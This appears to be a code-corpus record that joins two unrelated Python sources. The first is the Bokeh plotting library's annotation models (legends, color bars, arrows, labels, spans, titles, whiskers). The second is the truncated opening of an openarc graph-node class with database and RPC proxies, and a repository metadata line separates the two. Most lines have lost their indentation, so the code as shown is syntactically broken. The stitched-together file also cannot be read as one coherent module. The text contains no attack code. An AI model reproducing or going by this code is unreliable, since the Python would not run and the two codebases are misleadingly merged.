    A label for this legend item. Can be a string, or a column of a
ColumnDataSource. If ``label`` is a field, then it must
be in the renderers' data_source.
""")
renderers = List(Instance(GlyphRenderer), help="""
A list of the glyph renderers to draw in the legend. If ``label`` is a field,
then all data_sources of renderers must be the same.
""")
@error(NON_MATCHING_DATA_SOURCES_ON_LEGEND_ITEM_RENDERERS)
def _check_data_sources_on_renderers(self):
if self.label and 'field' in self.label:
if len({r.data_source for r in self.renderers}) != 1:
return str(self)
@error(BAD_COLUMN_NAME)
def _check_field_label_on_data_source(self):
if self.label and 'field' in self.label:
if len(self.renderers) < 1:
return str(self)
source = self.renderers[0].data_source
if self.label.get('field') not in source.column_names:
return str(self)
class Legend(Annotation):
''' Render informational legends for a plot.
'''
location = Either(Enum(LegendLocation), Tuple(Float, Float), default="top_right", help="""
The location where the legend should draw itself. It's either one of
``bokeh.core.enums.LegendLocation``'s enumerated values, or a ``(x, y)``
tuple indicating an absolute location absolute location in screen
coordinates (pixels from the bottom-left corner).
""")
orientation = Enum(Orientation, default="vertical", help="""
Whether the legend entries should be placed vertically or horizontally
when they are drawn.
""")
border_props = Include(LineProps, help="""
The %s for the legend border outline.
""")
border_line_color = Override(default="#e5e5e5")
border_line_alpha = Override(default=0.5)
background_props = Include(FillProps, help="""
The %s for the legend background style.
""")
inactive_props = Include(FillProps, help="""
The %s for the legend background style when inactive.
""")
click_policy = Enum(LegendClickPolicy, default="none", help="""
    Defines what happens when a legend item is clicked.
""")
background_fill_color = Override(default="#ffffff")
background_fill_alpha = Override(default=0.95)
inactive_fill_color = Override(default="white")
inactive_fill_alpha = Override(default=0.9)
label_props = Include(TextProps, help="""
The %s for the legend labels.
""")
label_text_baseline = Override(default='middle')
label_text_font_size = Override(default={'value': '10pt'})
label_standoff = Int(5, help="""
The distance (in pixels) to separate the label from its associated glyph.
""")
label_height = Int(20, help="""
The minimum height (in pixels) of the area that legend labels should occupy.
""")
label_width = Int(20, help="""
The minimum width (in pixels) of the area that legend labels should occupy.
""")
glyph_height = Int(20, help="""
The height (in pixels) that the rendered legend glyph should occupy.
""")
glyph_width = Int(20, help="""
The width (in pixels) that the rendered legend glyph should occupy.
""")
margin = Int(10, help="""
Amount of margin around the legend.
""")
padding = Int(10, help="""
    Amount of padding around the contents of the legend. Only applicable
    when the border is visible, otherwise collapses to 0.
""")
spacing = Int(3, help="""
    Amount of spacing (in pixels) between legend entries.
""")
items = List(Instance(LegendItem), help="""
    A list of :class:`~bokeh.models.annotations.LegendItem` instances to be
rendered in the legend.
This can be specified explicitly, for instance:
.. code-block:: python
legend = Legend(items=[
LegendItem(label="sin(x)" , renderers=[r0, r1]),
LegendItem(label="2*sin(x)" , renderers=[r2]),
LegendItem(label="3*sin(x)" , renderers=[r3, r4])
])
But as a convenience, can also be given more compactly as a list of tuples:
.. code-block:: python
legend = Legend(items=[
("sin(x)" , [r0, r1]),
("2*sin(x)" , [r2]),
("3*sin(x)" , [r3, r4])
])
where each tuple is of the form: *(label, renderers)*.
""").accepts(List(Tuple(String, List(Instance(GlyphRenderer)))), lambda items: [LegendItem(label=item[0], renderers=item[1]) for item in items])
class ColorBar(Annotation):
''' Render a color bar based on a color mapper.
'''
location = Either(Enum(LegendLocation), Tuple(Float, Float),
default="top_right", help="""
The location where the color bar should draw itself. It's either one of
``bokeh.core.enums.LegendLocation``'s enumerated values, or a ``(x, y)``
    tuple indicating an absolute location in screen
coordinates (pixels from the bottom-left corner).
.. warning::
If the color bar is placed in a side panel, the location will likely
have to be set to `(0,0)`.
""")
orientation = Enum(Orientation, default="vertical", help="""
Whether the color bar should be oriented vertically or horizontally.
""")
height = Either(Auto, Int(), help="""
The height (in pixels) that the color scale should occupy.
""")
width = Either(Auto, Int(), help="""
The width (in pixels) that the color scale should occupy.
""")
scale_alpha = Float(1.0, help="""
The alpha with which to render the color scale.
""")
title = String(help="""
The title text to render.
""")
title_props = Include(TextProps, help="""
The %s values for the title text.
""")
title_text_font_size = Override(default={'value': "10pt"})
title_text_font_style = Override(default="italic")
title_standoff = Int(2, help="""
The distance (in pixels) to separate the title from the color bar.
""")
ticker = Instance(Ticker, default=lambda: BasicTicker(), help="""
A Ticker to use for computing locations of axis components.
""")
formatter = Instance(TickFormatter, default=lambda: BasicTickFormatter(), help="""
A TickFormatter to use for formatting the visual appearance of ticks.
""")
major_label_overrides = Dict(Either(Float, String), String, default={}, help="""
Provide explicit tick label values for specific tick locations that
override normal formatting.
""")
color_mapper = Instance(ContinuousColorMapper, help="""
A continuous color mapper containing a color palette to render.
.. warning::
If the `low` and `high` attributes of the ColorMapper aren't set, ticks
and tick labels won't be rendered. Additionally, if a LogTicker is
passed to the `ticker` argument and either or both of the logarithms
of `low` and `high` values of the color_mapper are non-numeric
    (e.g. `low=0`), the ticks and tick labels won't be rendered.
""")
margin = Int(30, help="""
Amount of margin (in pixels) around the outside of the color bar.
""")
padding = Int(10, help="""
Amount of padding (in pixels) between the color scale and color bar border.
""")
major_label_props = Include(TextProps, help="""
The %s of the major tick labels.
""")
major_label_text_align = Override(default="center")
major_label_text_baseline = Override(default="middle")
major_label_text_font_size = Override(default={'value': "8pt"})
label_standoff = Int(5, help="""
The distance (in pixels) to separate the tick labels from the color bar.
""")
major_tick_props = Include(LineProps, help="""
The %s of the major ticks.
""")
major_tick_line_color = Override(default="#ffffff")
major_tick_in = Int(default=5, help="""
The distance (in pixels) that major ticks should extend into the
main plot area.
""")
major_tick_out = Int(default=0, help="""
The distance (in pixels) that major ticks should extend out of the
main plot area.
""")
minor_tick_props = Include(LineProps, help="""
The %s of the minor ticks.
""")
minor_tick_line_color = Override(default=None)
minor_tick_in = Int(default=0, help="""
The distance (in pixels) that minor ticks should extend into the
main plot area.
""")
minor_tick_out = Int(default=0, help="""
    The distance (in pixels) that minor ticks should extend out of the
main plot area.
""")
bar_props = Include(LineProps, help="""
The %s for the color scale bar outline.
""")
bar_line_color = Override(default=None)
border_props = Include(LineProps, help="""
The %s for the color bar border outline.
""")
border_line_color = Override(default=None)
background_props = Include(FillProps, help="""
The %s for the color bar background style.
""")
background_fill_color = Override(default="#ffffff")
background_fill_alpha = Override(default=0.95)
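# Minimal usage sketch (not part of this module): attach a color bar to an
# existing bokeh.plotting figure ``p``. Assumes a LinearColorMapper, which is
# a ContinuousColorMapper as required by ``color_mapper`` above.
#
#     from bokeh.models import LinearColorMapper, ColorBar
#     mapper = LinearColorMapper(palette="Viridis256", low=0, high=100)
#     p.add_layout(ColorBar(color_mapper=mapper, location=(0, 0)), 'right')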
# This only exists to prevent a circular import.
def _DEFAULT_ARROW():
from .arrow_heads import OpenHead
return OpenHead()
class Arrow(Annotation):
''' Render an arrow as an annotation.
'''
x_start = NumberSpec(help="""
The x-coordinates to locate the start of the arrows.
""")
y_start = NumberSpec(help="""
The y-coordinates to locate the start of the arrows.
""")
start_units = Enum(SpatialUnits, default='data', help="""
    The unit type for the x_start and y_start attributes. Interpreted as "data
space" units by default.
""")
start = Instance('.models.arrow_heads.ArrowHead', default=None, help="""
Instance of ArrowHead.
""")
x_end = NumberSpec(help="""
The x-coordinates to locate the end of the arrows.
""")
y_end = NumberSpec(help="""
The y-coordinates to locate the end of the arrows.
""")
end_units = Enum(SpatialUnits, default='data', help="""
    The unit type for the x_end and y_end attributes. Interpreted as "data
space" units by default.
""")
end = Instance('.models.arrow_heads.ArrowHead', default=_DEFAULT_ARROW, help="""
Instance of ArrowHead.
""")
body_props = Include(LineProps, use_prefix=False, help="""
The %s values for the arrow body.
""")
source = Instance(DataSource, help="""
Local data source to use when rendering annotations on the plot.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
class BoxAnnotation(Annotation):
''' Render a shaded rectangular region as an annotation.
'''
left = Either(Auto, NumberSpec(), default=None, help="""
The x-coordinates of the left edge of the box annotation.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""")
left_units = Enum(SpatialUnits, default='data', help="""
The unit type for the left attribute. Interpreted as "data space" units
by default.
""")
right = Either(Auto, NumberSpec(), default=None, help="""
The x-coordinates of the right edge of the box annotation.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""")
right_units = Enum(SpatialUnits, default='data', help="""
The unit type for the right attribute. Interpreted as "data space" units
by default.
""")
bottom = Either(Auto, NumberSpec(), default=None, help="""
The y-coordinates of the bottom edge of the box annotation.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""")
bottom_units = Enum(SpatialUnits, default='data', help="""
The unit type for the bottom attribute. Interpreted as "data space" units
by default.
""")
top = Either(Auto, NumberSpec(), default=None, help="""
The y-coordinates of the top edge of the box annotation.
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""")
top_units = Enum(SpatialUnits, default='data', help="""
The unit type for the top attribute. Interpreted as "data space" units
by default.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering box annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering box annotations on the plot. If unset, use the default y-range.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the box.
""")
line_alpha = Override(default=0.3)
line_color = Override(default="#cccccc")
fill_props = Include(FillProps, use_prefix=False, help="""
The %s values for the box.
""")
fill_alpha = Override(default=0.4)
fill_color = Override(default="#fff9ba")
render_mode = Enum(RenderMode, default="canvas", help="""
    Specifies whether the box is rendered as a canvas element or as a
css element overlaid on the canvas. The default mode is "canvas".
.. warning::
The line_dash and line_dash_offset attributes aren't supported if
the render_mode is set to "css"
""")
class Band(Annotation):
''' Render a filled area band along a dimension.
'''
lower = DistanceSpec(help="""
The coordinates of the lower portion of the filled area band.
""")
upper = DistanceSpec(help="""
    The coordinates of the upper portion of the filled area band.
""")
base = DistanceSpec(help="""
The orthogonal coordinates of the upper and lower values.
""")
dimension = Enum(Dimension, default='height', help="""
The direction of the band.
""")
source = Instance(DataSource, default=lambda: ColumnDataSource(), help="""
Local data source to use when rendering annotations on the plot.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the band.
""")
line_alpha = Override(default=0.3)
line_color = Override(default="#cccccc")
fill_props = Include(FillProps, use_prefix=False, help="""
The %s values for the band.
""")
fill_alpha = Override(default=0.4)
fill_color = Override(default="#fff9ba")
class Label(TextAnnotation):
''' Render a single text label as an annotation.
``Label`` will render a single text label at given ``x`` and ``y``
coordinates, which can be in either screen (pixel) space, or data (axis
range) space.
The label can also be configured with a screen space offset from ``x`` and
``y``, by using the ``x_offset`` and ``y_offset`` properties.
Additionally, the label can be rotated with the ``angle`` property.
There are also standard text, fill, and line properties to control the
appearance of the text, its background, as well as the rectangular bounding
box border.
'''
x = Float(help="""
    The x-coordinate to locate the text anchor (interpreted according to ``x_units``).
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""").accepts(Datetime, convert_datetime_type)
x_units = Enum(SpatialUnits, default='data', help="""
The unit type for the x attribute. Interpreted as "data space" units
by default.
""")
y = Float(help="""
    The y-coordinate to locate the text anchor (interpreted according to ``y_units``).
Datetime values are also accepted, but note that they are immediately
converted to milliseconds-since-epoch.
""").accepts(Datetime, convert_datetime_type)
y_units = Enum(SpatialUnits, default='data', help="""
The unit type for the y attribute. Interpreted as "data space" units
by default.
""")
text = String(help="""
The text value to render.
""")
angle = Angle(default=0, help="""
The angle to rotate the text, as measured from the horizontal.
.. warning::
The center of rotation for canvas and css render_modes is different.
For `render_mode="canvas"` the label is rotated from the top-left
corner of the annotation, while for `render_mode="css"` the annotation
    is rotated around its center.
""")
angle_units = Enum(AngleUnits, default='rad', help="""
Acceptable values for units are ``"rad"`` and ``"deg"``
""")
x_offset = Float(default=0, help="""
Offset value to apply to the x-coordinate.
This is useful, for instance, if it is desired to "float" text a fixed
distance in screen units from a given data position.
""")
y_offset = Float(default=0, help="""
Offset value to apply to the y-coordinate.
This is useful, for instance, if it is desired to "float" text a fixed
distance in screen units from a given data position.
""")
# TODO (bev) these should probably not be dataspec properties
text_props = Include(TextProps, use_prefix=False, help="""
The %s values for the text.
""")
# TODO (bev) these should probably not be dataspec properties
background_props = Include(FillProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
background_fill_color = Override(default=None)
# TODO (bev) these should probably not be dataspec properties
border_props = Include(LineProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
border_line_color = Override(default=None)
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen location when
rendering an annotation on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen location when
rendering an annotation on the plot. If unset, use the default y-range.
""")
render_mode = Enum(RenderMode, default="canvas", help="""
    Specifies whether the text is rendered as a canvas element or as a
css element overlaid on the canvas. The default mode is "canvas".
.. note::
The CSS labels won't be present in the output using the "save" tool.
.. warning::
Not all visual styling properties are supported if the render_mode is
set to "css". The border_line_dash property isn't fully supported and
border_line_dash_offset isn't supported at all. Setting text_alpha will
modify the opacity of the entire background box and border in addition
to the text. Finally, clipping Label annotations inside of the plot
area isn't supported in "css" mode.
""")
class LabelSet(TextAnnotation):
''' Render multiple text labels as annotations.
``LabelSet`` will render multiple text labels at given ``x`` and ``y``
coordinates, which can be in either screen (pixel) space, or data (axis
range) space. In this case (as opposed to the single ``Label`` model),
``x`` and ``y`` can also be the name of a column from a
:class:`~bokeh.models.sources.ColumnDataSource`, in which case the labels
will be "vectorized" using coordinate values from the specified columns.
The label can also be configured with a screen space offset from ``x`` and
``y``, by using the ``x_offset`` and ``y_offset`` properties. These offsets
may be vectorized by giving the name of a data source column.
Additionally, the label can be rotated with the ``angle`` property (which
may also be a column name.)
There are also standard text, fill, and line properties to control the
appearance of the text, its background, as well as the rectangular bounding
box border.
The data source is provided by setting the ``source`` property.
'''
x = NumberSpec(help="""
The x-coordinates to locate the text anchors.
""")
x_units = Enum(SpatialUnits, default='data', help="""
    The unit type for the x attribute. Interpreted as "data space" units
by default.
""")
y = NumberSpec(help="""
The y-coordinates to locate the text anchors.
""")
y_units = Enum(SpatialUnits, default='data', help="""
    The unit type for the y attribute. Interpreted as "data space" units
by default.
""")
text = StringSpec("text", help="""
The text values to render.
""")
angle = AngleSpec(default=0, help="""
The angles to rotate the text, as measured from the horizontal.
.. warning::
The center of rotation for canvas and css render_modes is different.
For `render_mode="canvas"` the label is rotated from the top-left
corner of the annotation, while for `render_mode="css"` the annotation
    is rotated around its center.
""")
x_offset = NumberSpec(default=0, help="""
Offset values to apply to the x-coordinates.
This is useful, for instance, if it is desired to "float" text a fixed
distance in screen units from a given data position.
""")
y_offset = NumberSpec(default=0, help="""
Offset values to apply to the y-coordinates.
This is useful, for instance, if it is desired to "float" text a fixed
distance in screen units from a given data position.
""")
text_props = Include(TextProps, use_prefix=False, help="""
The %s values for the text.
""")
background_props = Include(FillProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
background_fill_color = Override(default=None)
border_props = Include(LineProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
border_line_color = Override(default=None)
source = Instance(DataSource, default=lambda: ColumnDataSource(), help="""
Local data source to use when rendering annotations on the plot.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
render_mode = Enum(RenderMode, default="canvas", help="""
    Specifies whether the text is rendered as a canvas element or as a
css element overlaid on the canvas. The default mode is "canvas".
.. note::
The CSS labels won't be present in the output using the "save" tool.
.. warning::
Not all visual styling properties are supported if the render_mode is
set to "css". The border_line_dash property isn't fully supported and
border_line_dash_offset isn't supported at all. Setting text_alpha will
modify the opacity of the entire background box and border in addition
to the text. Finally, clipping Label annotations inside of the plot
area isn't supported in "css" mode.
""")
class PolyAnnotation(Annotation):
''' Render a shaded polygonal region as an annotation.
'''
xs = Seq(Float, default=[], help="""
The x-coordinates of the region to draw.
""")
xs_units = Enum(SpatialUnits, default='data', help="""
The unit type for the xs attribute. Interpreted as "data space" units
by default.
""")
ys = Seq(Float, default=[], help="""
The y-coordinates of the region to draw.
""")
ys_units = Enum(SpatialUnits, default='data', help="""
The unit type for the ys attribute. Interpreted as "data space" units
by default.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering box annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering box annotations on the plot. If unset, use the default y-range.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the polygon.
""")
line_alpha = Override(default=0.3)
line_color = Override(default="#cccccc")
fill_props = Include(FillProps, use_prefix=False, help="""
The %s values for the polygon.
""")
fill_alpha = Override(default=0.4)
fill_color = Override(default="#fff9ba")
class Span(Annotation):
""" Render a horizontal or vertical line span.
"""
location = Float(help="""
The location of the span, along ``dimension``.
""")
location_units = Enum(SpatialUnits, default='data', help="""
The unit type for the location attribute. Interpreted as "data space"
units by default.
""")
dimension = Enum(Dimension, default='width', help="""
The direction of the span.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
render_mode = Enum(RenderMode, default="canvas", help="""
    Specifies whether the span is rendered as a canvas element or as a
css element overlaid on the canvas. The default mode is "canvas".
.. warning::
The line_dash and line_dash_offset attributes aren't supported if
the render_mode is set to "css"
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the span.
""")
class Title(TextAnnotation):
''' Render a single title box as an annotation.
'''
text = String(help="""
The text value to render.
""")
align = Enum(TextAlign, default='left', help="""
Location to align the title text.
""")
offset = Float(default=0, help="""
Offset the text by a number of pixels (can be positive or negative). Shifts the text in
different directions based on the location of the title:
* above: shifts title right
* right: shifts title down
* below: shifts title right
* left: shifts title up
""")
text_font = String(default="helvetica", help="""
Name of a font to use for rendering text, e.g., ``'times'``,
``'helvetica'``.
""")
text_font_size = FontSizeSpec(default=value("10pt"))
text_font_style = Enum(FontStyle, default="bold", help="""
A style to use for rendering text.
Acceptable values are:
- ``'normal'`` normal text
- ``'italic'`` *italic text*
- ``'bold'`` **bold text**
""")
text_color = ColorSpec(default="#444444", help="""
A color to use to fill text with.
Acceptable values are:
    - any of the 147 named `CSS colors`_, e.g. ``'green'``, ``'indigo'``
- an RGB(A) hex value, e.g., ``'#FF0000'``, ``'#44444444'``
- a 3-tuple of integers (r,g,b) between 0 and 255
- a 4-tuple of (r,g,b,a) where r,g,b are integers between 0..255 and a is between 0..1
.. _CSS colors: http://www.w3schools.com/cssref/css_colornames.asp
""")
text_alpha = NumberSpec(default=1.0, help="""
An alpha value to use to fill text with.
Acceptable values are floating point numbers between 0 (transparent)
and 1 (opaque).
""")
background_props = Include(FillProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
background_fill_color = Override(default=None)
border_props = Include(LineProps, use_prefix=True, help="""
The %s values for the text bounding box.
""")
border_line_color = Override(default=None)
render_mode = Enum(RenderMode, default="canvas", help="""
    Specifies whether the text is rendered as a canvas element or as a
css element overlaid on the canvas. The default mode is "canvas".
.. note::
The CSS labels won't be present in the output using the "save" tool.
.. warning::
Not all visual styling properties are supported if the render_mode is
set to "css". The border_line_dash property isn't fully supported and
border_line_dash_offset isn't supported at all. Setting text_alpha will
modify the opacity of the entire background box and border in addition
to the text. Finally, clipping Label annotations inside of the plot
area isn't supported in "css" mode.
""")
class Tooltip(Annotation):
''' Render a tooltip.
.. note::
This model is currently managed by BokehJS and is not useful
directly from python.
'''
level = Override(default="overlay")
attachment = Enum("horizontal", "vertical", "left", "right", "above", "below", help="""
    Whether the tooltip should display to the left or right of the cursor
position or above or below it, or if it should be automatically placed
in the horizontal or vertical dimension.
""")
inner_only = Bool(default=True, help="""
    Whether to display the tooltip only within the central plot frame area.
""")
show_arrow = Bool(default=True, help="""
    Whether the tooltip's arrow should be shown.
""")
# This only exists to prevent a circular import.
def _DEFAULT_TEE():
from .arrow_heads import TeeHead
return TeeHead(level="underlay", size=10)
class Whisker(Annotation):
''' Render a whisker along a dimension.
'''
lower = DistanceSpec(help="""
The coordinates of the lower end of the whiskers.
""")
lower_head = Instance('.models.arrow_heads.ArrowHead', default=_DEFAULT_TEE, help="""
Instance of ArrowHead.
""")
upper = DistanceSpec(help="""
    The coordinates of the upper end of the whiskers.
""")
upper_head = Instance('.models.arrow_heads.ArrowHead', default=_DEFAULT_TEE, help="""
Instance of ArrowHead.
""")
base = DistanceSpec(help="""
The orthogonal coordinates of the upper and lower values.
""")
dimension = Enum(Dimension, default='height', help="""
    The direction of the whisker.
""")
source = Instance(DataSource, default=lambda: ColumnDataSource(), help="""
Local data source to use when rendering annotations on the plot.
""")
x_range_name = String('default', help="""
A particular (named) x-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default x-range.
""")
y_range_name = String('default', help="""
A particular (named) y-range to use for computing screen locations when
rendering annotations on the plot. If unset, use the default y-range.
""")
line_props = Include(LineProps, use_prefix=False, help="""
The %s values for the whisker body.
""")
level = Override(default="underlay")
| philippjfr/bokeh | bokeh/models/annotations.py | Python | bsd-3-clause | 33,790 |
__all__ = [
'OAG_RootNode',
'OAG_RootD',
'OAG_RpcDiscoverable'
]
import attrdict
import datetime
import hashlib
import inflection
import inspect
import os
import signal
import socket
import sys
from ._db import *
from ._env import *
from ._rdf import *
from ._rpc import reqcls, RpcTransaction, RpcProxy, RestProxy, RpcACL
from ._util import oagprop, staticproperty
from openarc.exception import *
from openarc.time import *
class OAG_RootNode(object):
##### Class variables
_fkframe = []
##### Proxies
@property
def cache(self):
return self._cache_proxy
@property
def db(self):
return self._db_proxy
@property
def rdf(self):
return self._rdf_proxy
@property
def props(self):
return self._prop_proxy
@property
def rpc(self):
return self._rpc_proxy
@property
def REST(self):
return self._rest_proxy
##### User defined via inheritance
@staticproperty
def context(cls):
raise NotImplementedError("Must be implemented in deriving OAGraph class")
@staticproperty
def dbindices(cls): return {}
@staticproperty
def dblocalsql(cls): return {}
@staticproperty
def infname_fields(cls):
"""Override in deriving classes as necessary"""
return sorted([k for k, v in cls.streams.items()])
@staticproperty
def is_unique(cls): return False
@staticproperty
def nonstream_deps(cls): return []
@staticproperty
def restapi(cls): return {}
@staticproperty
def streamable(cls): return True
@staticproperty
def streams(cls):
raise NotImplementedError("Must be implemented in deriving OAGraph class")
##### Derivative fields
@staticproperty
def dbpkname(cls): return "_%s_id" % cls.dbtable
@staticproperty
def dbtable(cls):
ca_prop = getattr(cls, '_dbtable_name', ())
if not ca_prop or (len(ca_prop)>0 and ca_prop[0]!=cls):
db_table_name = inflection.underscore(cls.__name__)[4:]
setattr(cls, '_dbtable_name', (cls, db_table_name))
if not cls.is_reversible:
raise OAError("This table name isn't reversible: [%s]" % cls.__name__)
return cls._dbtable_name[1]
@classmethod
def is_oagnode(cls, stream):
try:
streaminfo = cls.streams[stream][0]
if type(streaminfo).__name__=='type':
return 'OAG_RootNode' in [x.__name__ for x in inspect.getmro(streaminfo)]
else:
return False
except KeyError:
return False
@classmethod
def is_scalar(cls, stream):
try:
return type(cls.streams[stream][0])==str
except KeyError:
            # If there's a KeyError, the caller either fed this function junk
            # data or asked about an internal member beginning with '_'; in
            # both cases treat it as a scalar and return True.
return True
@classmethod
def is_enum(cls, stream):
try:
return cls.is_scalar(stream)==False and cls.is_oagnode(stream)==False
except KeyError:
return False
@staticproperty
def is_reversible(cls):
ca_prop = getattr(cls, '_is_reversible', ())
if not ca_prop or (len(ca_prop)>0 and ca_prop[0]!=cls):
reverse_class_name = "OAG_"+inflection.camelize(cls.dbtable)
setattr(cls, '_is_reversible', (cls, reverse_class_name == cls.__name__))
return cls._is_reversible[1]
@staticproperty
def stream_db_mapping(cls):
ca_prop = getattr(cls, '_stream_db_mapping', ())
if not ca_prop or (len(ca_prop)>0 and ca_prop[0]!=cls):
schema = {}
for stream, streaminfo in cls.streams.items():
if cls.is_oagnode(stream):
schema[stream] = streaminfo[0].dbpkname[1:]+'_'+stream
else:
schema[stream] = stream
setattr(cls, '_stream_db_mapping', (cls, schema))
return cls._stream_db_mapping[1]
@staticproperty
def db_stream_mapping(cls):
ca_prop = getattr(cls, '_db_stream_mapping', ())
if not ca_prop or (len(ca_prop)>0 and ca_prop[0]!=cls):
setattr(cls, '_db_stream_mapping', (cls, {cls.stream_db_mapping[k]:k for k in cls.stream_db_mapping}))
return cls._db_stream_mapping[1]
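    # Illustrative sketch (hypothetical subclass, for orientation only):
    # given streams = {'name': ['text', "", None], 'owner': [OAG_User, True, None]},
    # stream_db_mapping yields {'name': 'name', 'owner': 'user_id_owner'}
    # (oagnode streams are stored under the referenced table's pk column name,
    # minus its leading underscore, suffixed with the stream name), and
    # db_stream_mapping is simply the inverse of that dict.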
##### User API
@property
def id(self):
try:
return self.props._cframe[self.dbpkname]
except:
return None
@property
def infname(self):
if len(self.props._cframe)==0:
raise OAError("Cannot calculate infname if OAG attributes have not set")
hashstr = str()
for stream in self.infname_fields:
node = getattr(self, stream, None)
hashstr += node.infname if self.is_oagnode(stream) and node else str(node)
return hashlib.sha256(hashstr.encode('utf-8')).hexdigest()
@property
def infname_semantic(self):
if None in [self.db.searchidx, self.db.searchprms]:
raise OAError("Cannot calculate infname_semantic if search parameters are not initialized")
hashstr = str()
hashstr += self.context
hashstr += self.__class__.__name__
hashstr += self.db.searchidx
for searchprm in self.db.searchprms:
hashstr += str(searchprm)
return hashlib.sha256(hashstr.encode('utf-8')).hexdigest()
@property
def is_materialized(self):
"""Has been persisted to the database"""
return self.id is not None
def clone(self):
oagcopy = self.__class__()
oagcopy._iteridx = 0
# Clone proxies
oagcopy.rdf.clone(self)
oagcopy.db.clone(self)
oagcopy.props.clone(self)
if oagcopy.is_unique:
oagcopy.props._set_attrs_from_cframe_uniq()
return oagcopy
def reset(self, idxreset=True):
self.rdf._rdf_window = self.rdf._rdf
if idxreset:
self._iteridx = 0
self.props._set_attrs_from_cframe()
return self
@property
def size(self):
if self.rdf._rdf_window is None:
return 0
else:
return len(self.rdf._rdf_window)
@property
def url(self):
return self.rpc.url
##### Stream attributes
##### Internals
def __del__(self):
        # If the table isn't reversible, the OAG would never have been created
if not self.is_reversible:
return
oalog.debug(f"GC=========>", f='gc')
oalog.debug("Deleting {} {}, {}, proxy: {}".format(
self,
self.rpc.id if self.rpc.is_enabled else str(),
self.rpc.url if self.rpc.is_enabled else str(),
self.rpc.is_proxy
), f='gc')
if self.rpc.is_enabled:
# Tell upstream proxies that we are going away
if self.rpc.is_proxy:
oalog.debug(f"Delete: proxies", f='gc')
oalog.debug(f"--> {self.rpc.proxied_url}", f='gc')
oactx.rm_ka_via_rpc(self.rpc.url, self.rpc.proxied_url, 'proxy')
# Tell upstream registrations that we are going away
oalog.debug(f"Delete: registrations", f='gc')
oalog.debug(f"--> {self.rpc.registrations}", f='gc')
# Tell subnodes we are going away
oalog.debug(f"Delete cache", f='gc')
oalog.debug(f"--> {self.cache.state}", f='gc')
self.cache.clear()
oalog.debug(f"Delete: queue size", f='gc')
oalog.debug(f"--> {oactx.rm_queue_size}", f='gc')
# print("Delete: stop router")
# self.rpc._glets[0].kill()
oalog.debug("<=========GC", f='gc')
def __enter__(self):
self.rpc.discoverable = True
return self
def __exit__(self, type, value, traceback):
self.rpc.discoverable = False
def __getattribute__(self, attr):
"""Cascade through the following lookups:
1. Attempt a lookup via the prop proxy
2. Attempt to retrieve via RPC if applicable.
3. Attempt a regular attribute lookup.
Failure at each step is denoted by the generation of an AttributeError"""
try:
props = object.__getattribute__(self, '_prop_proxy')
return props.get(attr, internal_call=True)
except AttributeError as e:
pass
try:
if object.__getattribute__(self, 'is_proxy'):
rpc = object.__getattribute__(self, '_rpc_proxy')
if attr in rpc.proxied_streams:
oalog.debug(f"[{rpc.id}] proxying request for [{attr}] to [{rpc.proxied_url}]", f='rpc')
payload = reqcls(self).getstream(rpc.proxied_url, attr)['payload']
if payload['value']:
if payload['type'] == 'redirect':
for cls in OAG_RootNode.__subclasses__():
if cls.__name__==payload['class']:
return cls(initurl=payload['value'])
else:
return payload['value']
else:
raise AttributeError("[%s] does not exist at [%s]" % (attr, rpc.proxied_url))
except AttributeError:
pass
return object.__getattribute__(self, attr)
def __getitem__(self, indexinfo, preserve_cache=False):
self.rdf._rdf_window_index = indexinfo
if self.is_unique:
raise OAError("Cannot index OAG that is marked unique")
if not preserve_cache and self._iteridx != self.rdf._rdf_window_index:
self.cache.clear()
if type(self.rdf._rdf_window_index)==int:
self.props._cframe = self.rdf._rdf_window[self.rdf._rdf_window_index]
elif type(self.rdf._rdf_window_index)==slice:
self.rdf._rdf_window = self.rdf._rdf_window[self.rdf._rdf_window_index]
self.props._cframe = self.rdf._rdf_window[0]
self.props._set_attrs_from_cframe()
return self
@classmethod
def __graphsubclasses__(cls):
subclasses = cls.__subclasses__()
for subclass in cls.__subclasses__():
subclasses += subclass.__graphsubclasses__()
return subclasses
def __init__(
self,
# Implied positional args
searchprms=[],
searchidx='id',
searchwin=None,
searchoffset=None,
searchdesc=False,
# Actual Named args
throw_on_empty=True,
heartbeat=True,
initprms={},
initurl=None,
initschema=True,
rest=False,
rpc=True,
